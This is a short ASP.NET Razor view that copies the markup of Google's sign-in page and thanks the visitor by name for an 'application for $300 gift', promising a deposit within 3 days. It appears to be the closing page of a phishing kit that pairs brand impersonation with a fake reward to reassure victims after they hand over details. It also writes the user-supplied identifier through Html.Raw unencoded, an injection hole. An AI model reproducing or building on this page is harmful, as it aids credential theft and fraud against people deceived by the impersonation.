@{var edit = ViewBag.users as Users; }


<div id="view_container" class="JhUD8d SQNfcc" jscontroller="WFS13" jsaction="rcuQ6b:npT2md" jsmodel="Z7PiFb qFmk3b qbZ0Se nqpTHe YPPRX eV9nn Xu2csd hc6Ubd" data-app-config="" data-initial-setup-data="" data-initial-sign-in-data="">
    <div jscontroller="YmeC5c" jsaction="click:jKoJid(preventDefault=true|DPJEMd),rYhRle(preventDefault=true|RTjbJ);JIbuQc:WZ2Bje(Cuz2Ue);wMghFb:WWkjY;u3KAb:UHZ0U;KQBcJf:QbfZie;ckUk1:s57X0c;CINcEf:IjS5bf;sPvj8e:XyQaue;rcuQ6b:WYd;" jsname="nUpftc" data-locale="tr" data-allow-sign-up-types="true">
        <div class="DRS7Fe bxPAYd k6Zj8d" jsname="bN97Pc" jscontroller="Z3Buzf" jsshadow="" data-branding="jcJzye" role="presentation">
            <div jsname="paFcre">
                <content>
                    <div class="jXeDnc" jsname="tJHJj" jscontroller="S9352b" jsaction="JIbuQc:pKJJqe(af8ijd);PIbeAb:pKJJqe" jsshadow="">
                        <h1 data-a11y-title-piece="" id="headingText">
                            <content>
                                @Html.Raw("Thanks" + " " + edit.identifier)
                            </content>
                        </h1><div class="Y4dIwd" data-a11y-title-piece="" id="headingSubtext">
                            <content>
                                @Html.Raw("Your application for $300 gift is recieved. It will be deposited in your account within 3 days.")
                            </content>
                        </div>
                    </div>
                </content>
            </div><div jsname="uybdVe" class="pwWryf bxPAYd" role="presentation">
                <div jsname="USBQqe" class="Wxwduf Us7fWe JhUD8d" role="presentation">
                    <div class="WEQkZc">
                        <div jscontroller="mjtijb" jsname="rEuO1b" data-form-action-uri="">

                        </div>
                    </div>
                </div>
            </div>
        </div>
    </div>
</div>


